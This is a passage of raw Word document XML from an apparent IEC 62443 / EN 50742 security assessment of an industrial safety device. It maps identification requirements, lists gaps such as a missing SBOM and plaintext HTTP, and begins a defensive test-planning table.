      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">IEC 62443-4-2 CR Mapping: </w:t>
      </w:r>
      <w:r w:rsidR="00B67525">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B67525" w:rsidRPr="00B67525">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CR 7.8</w:t>
      </w:r>
      <w:r w:rsidR="00B305C0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(,</w:t>
      </w:r>
      <w:r w:rsidR="00B67525" w:rsidRPr="00B67525">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> CR 4.1</w:t>
      </w:r>
      <w:r w:rsidR="00B305C0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543B3363" w14:textId="11DE5046" w:rsidR="009C0A46" w:rsidRPr="00897779" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Target Assets: </w:t>
      </w:r>
      <w:r w:rsidR="00B67525">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B67525" w:rsidRPr="00B67525">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>B (Config), D (Safety Firmware)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2F4137" w14:textId="49F13C60" w:rsidR="009C0A46" w:rsidRDefault="00196EB6">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00196EB6">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">STRIDE: </w:t>
      </w:r>
      <w:r w:rsidR="007F5A7B" w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009C0A46" w:rsidRPr="00280EAE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B67525" w:rsidRPr="00B67525">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tampering</w:t>
      </w:r>
      <w:r w:rsidR="00F60998">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, Information Disclosure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096784ED" w14:textId="77777777" w:rsidR="00E33A9C" w:rsidRPr="00E33A9C" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB6633">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Security Function (Mitigation): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3B3BBC" w14:textId="5312B96F" w:rsidR="00E33A9C" w:rsidRPr="00E33A9C" w:rsidRDefault="00E33A9C" w:rsidP="00E33A9C">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E33A9C">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Version/identification API (IoT-Core)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E33A9C">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> /deviceinfo/hwversion, /hwrevision, /swrevision, /swinfo/scpuversion, /swinfo/cpubootloaderversion, /swinfo/scpubootloaderversion (SRIO-2946 ff.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6F5092" w14:textId="2602B0A4" w:rsidR="00E33A9C" w:rsidRPr="00E33A9C" w:rsidRDefault="00E33A9C" w:rsidP="00E33A9C">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E33A9C">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>I&amp;M0 / I&amp;M5</w:t>
      </w:r>
      <w:r w:rsidR="00BF2CEC">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E33A9C">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Identity (MANUFACTURER_ID, ORDER_ID, SERIAL, HW/SW revision) and host-fw annotation</w:t>
      </w:r>
      <w:r w:rsidR="00BF2CEC">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E33A9C">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> PROFINET acyclic records (SRIO-3002/3023).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AFBB5E" w14:textId="22DF7589" w:rsidR="00E33A9C" w:rsidRPr="00BF2CEC" w:rsidRDefault="00E33A9C" w:rsidP="00BF2CEC">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E33A9C">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>I&amp;M4 data fingerprint</w:t>
      </w:r>
      <w:r w:rsidR="00BF2CEC">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E33A9C">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> F_iParCRC + F_Par_CRC uniquely characterise the loaded safety configuration (SRIO-3011). This is a partial DATA-identification control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6563EE93" w14:textId="08611543" w:rsidR="00EB240D" w:rsidRPr="00EA5B7B" w:rsidRDefault="007F5A7B" w:rsidP="00EA5B7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB6633">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Identified Gap: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A4B40C" w14:textId="7CCF9377" w:rsidR="00EB240D" w:rsidRPr="00EB240D" w:rsidRDefault="00EB240D" w:rsidP="00EB240D">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB240D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G-1 (residual only)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB240D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> I&amp;M4 identifies </w:t>
      </w:r>
      <w:r w:rsidR="00EA5B7B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>that</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB240D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> a specific configuration is loaded</w:t>
      </w:r>
      <w:r w:rsidR="00EA5B7B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB240D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">but the device does not enumerate/classify </w:t>
      </w:r>
      <w:r w:rsidR="00EA5B7B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>which</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB240D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> data elements are EHSR-critical. Report this as the residual limitation, not as ‘data is not addressed.’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199BF24D" w14:textId="6E4838B4" w:rsidR="00EB240D" w:rsidRPr="00EB240D" w:rsidRDefault="00EB240D" w:rsidP="00EB240D">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB240D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G-2</w:t>
      </w:r>
      <w:r w:rsidR="004B6A61">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB240D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> CR 7.8 expects identification of the third-party software genuinely critical for EHSR compliance: µC/OS-II (SRIO-1260), the SIL3 PROFIsafe stack (SRIO-1929), the STM32F7 self-test library (SRIO-10766), the netX90 PROFINET stack </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB240D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(SRIO-1768). Only top-level version strings are exposed and there is no SBOM </w:t>
      </w:r>
      <w:r w:rsidR="004B6A61" w:rsidRPr="004B6A61">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00EB240D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> these cannot be inventoried or CVE-correlated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598D9EC1" w14:textId="078E4E29" w:rsidR="00EB240D" w:rsidRDefault="00EB240D" w:rsidP="00EB240D">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB240D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G-3</w:t>
      </w:r>
      <w:r w:rsidR="008365E0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB240D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Identification is served over plaintext HTTP (SRIO-7903/7907). Keep as a defence-in-depth observation only; under EN 50742 Approach B this is NOT a safety-security conformance FAIL (FR4 = none).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C6EBDF" w14:textId="74CB0976" w:rsidR="002B119D" w:rsidRPr="002B119D" w:rsidRDefault="002B119D" w:rsidP="002B119D">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B781E81" w14:textId="77777777" w:rsidR="002B119D" w:rsidRDefault="002B119D" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="286CC92D" w14:textId="77777777" w:rsidR="00555ADD" w:rsidRDefault="00555ADD" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AB43899" w14:textId="77777777" w:rsidR="00555ADD" w:rsidRDefault="00555ADD" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="532DC787" w14:textId="77777777" w:rsidR="00555ADD" w:rsidRDefault="00555ADD" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73017307" w14:textId="77777777" w:rsidR="00555ADD" w:rsidRDefault="00555ADD" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31410AAF" w14:textId="77777777" w:rsidR="00555ADD" w:rsidRDefault="00555ADD" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B90954F" w14:textId="77777777" w:rsidR="00555ADD" w:rsidRDefault="00555ADD" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B4C4677" w14:textId="77777777" w:rsidR="00555ADD" w:rsidRDefault="00555ADD" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FEA7D61" w14:textId="77777777" w:rsidR="00555ADD" w:rsidRDefault="00555ADD" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37F6EBF6" w14:textId="77777777" w:rsidR="00555ADD" w:rsidRDefault="00555ADD" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C58BBB2" w14:textId="77777777" w:rsidR="00555ADD" w:rsidRDefault="00555ADD" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="706438CF" w14:textId="77777777" w:rsidR="00555ADD" w:rsidRDefault="00555ADD" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06DD2A5F" w14:textId="77777777" w:rsidR="00555ADD" w:rsidRDefault="00555ADD" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77C10A30" w14:textId="77777777" w:rsidR="00555ADD" w:rsidRDefault="00555ADD" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="703E5D22" w14:textId="77777777" w:rsidR="00555ADD" w:rsidRDefault="00555ADD" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40DF6F95" w14:textId="77777777" w:rsidR="002B119D" w:rsidRPr="00DA402C" w:rsidRDefault="002B119D" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E26A9C1" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Methodological Test Planning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4B28EE"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136AF5" w14:paraId="7D928A76" w14:textId="77777777" w:rsidTr="00F730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FB4C92" w14:textId="77777777" w:rsidR="00136AF5" w:rsidRDefault="00136AF5" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DB54CFC" w14:textId="77777777" w:rsidR="00136AF5"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5F57587B" w14:textId="77777777" w:rsidR="00136AF5"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34EA471E" w14:textId="77777777" w:rsidR="00136AF5"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1AB71AF9" w14:textId="77777777" w:rsidR="00136AF5"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136AF5" w:rsidRPr="007F5798" w14:paraId="679FB71B"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9D6C00F" w14:textId="77777777" w:rsidR="00136AF5" w:rsidRPr="00462D28" w:rsidRDefault="00136AF5" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r w:rsidRPr="00462D28">
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="62BADD40" w14:textId="77777777" w:rsidR="00BC45CE" w:rsidRPr="00672963"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672963">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t xml:space="preserve">Enumerate the identification surface (/deviceinfo/*, I&amp;M0, I&amp;M5, /firmware/version, /fieldbussetup/fieldbusfirmware, I&amp;M4 for data); </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E92EE91" w14:textId="34CE2053" w:rsidR="00136AF5" w:rsidRPr="00672963"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72963">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>build the actual inventory and diff vs. expected EHSR-critical SW+data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25D718E7" w14:textId="7C27F174" w:rsidR="00136AF5" w:rsidRPr="00672963" w:rsidRDefault="00D75A3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72963">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Functional CR 7.8; confirms SW + data (I&amp;M4) identification; exposes </w:t>
            </w:r>
            <w:r w:rsidR="00F73B00" w:rsidRPr="00672963">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>G2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47E322CB" w14:textId="45505296" w:rsidR="00136AF5" w:rsidRPr="006669AB"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CA6282">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Requirements-based verification;</w:t>
            </w:r>
            <w:r w:rsidRPr="007862DB">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F97F44">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>OWASP FSTM Stage 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6FBAAD85" w14:textId="1B4CC660" w:rsidR="00136AF5" w:rsidRPr="00F97F44"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F97F44">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00136AF5" w:rsidRPr="00D258C9" w14:paraId="7C7AD2D0"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540874F" w14:textId="77777777" w:rsidR="00136AF5" w:rsidRDefault="00136AF5" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DE3C5C2" w14:textId="77777777" w:rsidR="005F11CE" w:rsidRPr="00F418E5"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418E5">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">SBOM-completeness / version→CVE analysis: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65F25E63" w14:textId="77777777" w:rsidR="00412834" w:rsidRPr="00F418E5"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418E5">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">attempt to derive third-party components (µC/OS-II, PROFIsafe stack, STM STL, netX90); </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4793CF3F" w14:textId="7B89864E" w:rsidR="00136AF5" w:rsidRPr="005F11CE" w:rsidRDefault="004C034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18E5">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>show no SBOM → no CVE correlation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C826CF2" w14:textId="78932F79" w:rsidR="00136AF5" w:rsidRPr="00E74F1C" w:rsidRDefault="001F435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74F1C">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Proves G-2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="029A3737" w14:textId="382A4720" w:rsidR="00136AF5" w:rsidRPr="00CD33CB" w:rsidRDefault="00CD33CB" w:rsidP="00CD33C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D33CB">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>OWASP FSTM ‘SBOM Generation’; BSI TR-03183-2; 62443-4-1 SM-9/SM-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7144EE67" w14:textId="6BA3FAEB" w:rsidR="00136AF5" w:rsidRPr="00A54217" w:rsidRDefault="00AF423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54217">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV-3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00136AF5" w:rsidRPr="00D0764E" w14:paraId="2253746E"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EF66DFA" w14:textId="77777777" w:rsidR="00136AF5" w:rsidRDefault="00136AF5" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EE5BF67" w14:textId="2EE99C1F" w:rsidR="00136AF5" w:rsidRPr="00F73030" w:rsidRDefault="00EA038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A0382">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Passive plaintext capture of the identification traffic (defence-in-depth observation, not a FAIL under EN 50742 FR4=none)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6EEC9301" w14:textId="4C374469" w:rsidR="00136AF5" w:rsidRPr="008F3992" w:rsidRDefault="000E1482" w:rsidP="000E148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E1482">
              <w:t>Documents G-3 (DiD only)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FB15FAC" w14:textId="77777777" w:rsidR="007C27F1" w:rsidRPr="008F3992"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8F3992">
              <w:t xml:space="preserve">NIST SP 800-115 §3.5; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BFB51B8" w14:textId="4C14A958" w:rsidR="007C27F1" w:rsidRPr="008F3992"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8F3992">
              <w:t xml:space="preserve">OWASP ISTG-DES-INFO; </w:t>
            </w:r>
          </w:p>
